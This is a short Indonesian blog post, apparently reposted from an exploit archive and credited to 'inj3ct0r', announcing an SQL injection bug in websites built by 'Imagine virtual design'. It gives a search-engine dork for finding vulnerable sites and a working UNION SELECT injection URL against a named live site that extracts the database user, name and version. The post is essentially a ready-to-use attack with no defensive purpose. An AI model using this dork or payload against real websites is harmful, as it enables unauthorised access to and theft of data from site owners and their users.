Bug SQL Injection di "Imagine virtual design"
Exploit 0 Comments »
[ type attack ]
SQL Injection
[ dork ]
SQL Injection
[ dork ]
intext:"Design by imagine virtual" inurl:".php?id="
[ demo ]
http://www.incasadesign.com/quadros.php?id=-204' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
[ details ]
inj3ct0r
0 Responses to "Bug SQL Injection di "Imagine virtual design""
Posting Komentar